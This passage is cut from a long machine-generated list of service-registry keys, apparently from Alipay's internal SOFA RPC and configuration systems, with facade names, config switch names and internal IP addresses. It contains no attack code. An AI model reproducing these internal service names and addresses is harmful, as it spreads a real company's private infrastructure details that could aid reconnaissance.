lipay.inshealthmarket.common.service.facade.service.ProductInstructionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINCOMMONTASKHUB#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.page.AlarmScreeningFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.OneKeyActivityOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.instrument:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.core.service.api.DailyCutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.stepflow.engine.facade.StepFlowEngineServerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finlinkdata.common.service.facade.contract.service.MrctInstContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.29.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clearingcenter.facade.api.ClearingAgreementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.riskaction.FundsRiskActionManager:1.0:forecast@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendPriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.unioncard.service.UnionCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimProgressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.interpersonal.InterpersonalRelationshipQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.accept.FinbatchSeqService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.advert.PublicAdmgrFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.DataService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.platform.common.service.facade.api.project.ProjectOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.basic.accouting.settlement.SettlementFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_PAYLINK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.openresource.OpenResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.254.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.miniapp.miniappfacade.MiniAppExperienceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.common.service.facade.influx.InfluxQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-F-MINITRANS_LOADTEST_T#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sdchecker.service.analyze.facade.DqDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.VelocityInfoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.55.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.157.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:cloudbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cscheck.service.facade.api.QcRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.MaintenanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbitemprodSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.merchant.facade.ProxyMerchantCardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.finfocoreTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.24.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.InsGuaranteeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.operatorauth.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.InvolvedPartyRoleViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudprovision.cloudprovision_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finTaskHubCallBacker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openSerialReceiptDB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbocenter.common.service.facade.order.OrderMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.feature.FeatureGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:riskdatacenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseInspectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.smartant.drm.SmartAntParamDrmManager.bannerCardDegradeFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.manage.FundFileDisposeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.service.YebFatigueReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zeroxrisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.171.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.api.SignAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradeBaseQueryFacade:1.0:tradequeryprod@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradePayWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.framodel.core.service.facade.api.FramodelIndicatorDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paygrowth.common.service.facade.XiniuSurveyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:payrouter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipss.service.facade.api.CampaignDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.DsdbMainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:revcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffxtrade.common.service.facade.api.FxCounterpartQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_DEVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfinstweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchmembercore.common.facade.KaBaoInstanceOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.SubProductManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:basement-coffeepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerv2_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zmng.facade.facerecord.FaceTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.tenantuiconfig.api.TenantUiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graywall.common.service.facade.api.CalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.diff.api.StatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:promoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mrchcommons.base.facade.ObjectPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.meta.ServiceMetaValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue25#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.AsyncOperationResource.stringAsyncCheckRecoverCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileic.common.service.facade.device.spi.DeviceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.geoip.CommonGeoIpServerRecordService:1.0:cn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.loadcontroller.common.facade.AgentTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.162.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.75.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.FamilyAcRelationQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstassetprod.common.service.facade.api.IaAssetFinancingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_APP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.goldSceneTopicId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.ucdp.ResultDiffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.repay.RiskRepayApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.ApplyBreakServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtbank.facade.api.BenefitManageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdchecker.common.dal.dataquality.baichuan.BaiChuanExplorerDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.custom.facade.custom.citycoupon.api.FrontPageCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.MerchantBillSummaryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.bigscreenDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_1205#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.shop.ShopPublicMenuQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.SharePPayPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.RegisterSupportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.settle.SettleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceTryCenterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:taskApproval_Process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:indirectOperational@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.bigbuy.BigBuyPartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-minicenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.withdraw.api.QueryWithdrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundTempDataOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.assetcenter.batchfile.SubDailyTimeBatchTaskCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.core.service.ins.repository.InsuranceInstitutionRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.leads.LeadsOwnerHistoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oasis.common.service.facade.dataproxy.DataProxyTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.campaign.DiscountCampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.navigator.UserNavManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.DsKpiMsgTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.environment.api.EnvironmentSupportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:unfiedLimitArgoConfigDeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.team.TeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.capitalpool.api.CapitalPoolConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishRecDrmImpl.recWishString50,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-originPriceAnnualResult@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Notify_SubscriptionInfo_BindingTP_O_FINCAPACITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudinc:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.service.facade.compatible.service.MasterDataOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:adart_routeprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.lock.BizLockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AppToAppAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.253.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.equitytradecore.common.service.facade.api.LimitedPartnerTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcorporation.common.service.facade.api.AlCorpMeetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linksec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:accorderexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:loginxiaowei@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.sales.InvitationRecordService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cardbin:name=com.alipay.cardbin.base.refresh.baseCardBinContent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.displaygoods.DisplayGoodsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.session.SessionRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloancommon.common.service.facade.arrealm.standard.api.ArrangementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.205.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.FundTradeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.csmonitor.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.component.service.ProcessService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.query.ChannelSwitcherStatusQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardDirectDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoPackageFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.110.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.loanpromoweb.service.facade.TrRouteEntry:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:progov_demandFlowCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxFundsExchangeTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.CustomerTagQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gmodelcenter.common.service.api.standard.sla.SlaAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthRenewalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.message.MsgBrokerPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.reservecenter.common.service.facade.api.LiquidityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.category.CategoryConfigPubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAssetSortDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csconfig.common.service.client.TreeQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.prodcenter.common.service.facade.contract.api.PsContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.OperationLogService:1.0:instopen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.settlement.api.KbSettleNotifyConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.InsClaimDecisionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundTradeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.kashi.tool.KsTimingToolFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_keymap_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoplaycenter.common.service.facade.api.PlayConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@antpim#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.merchantParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopencore.common.service.luckydraw.facade.LuckyDrawQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.datafile.handler.DataFileSubmitHandler:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.TenantUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanApplyCmd.data,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.muac.api.facade.qdb.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.4.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gfbill.common.service.facade.api.BillAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fincompose.common.service.facade.ComposeRequestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.myhome.service.facade.AppDataFacade:1.0:insxhbprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alp.facade.PredictChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.AliloanCusModifyCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.uniintegration.facade.UniIntegrationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.bma.activity.ActivityReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditchannel.facade.agreement.service.AgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.secumachine.LdcSecuMachineService:1.0:report@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MATERIALCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.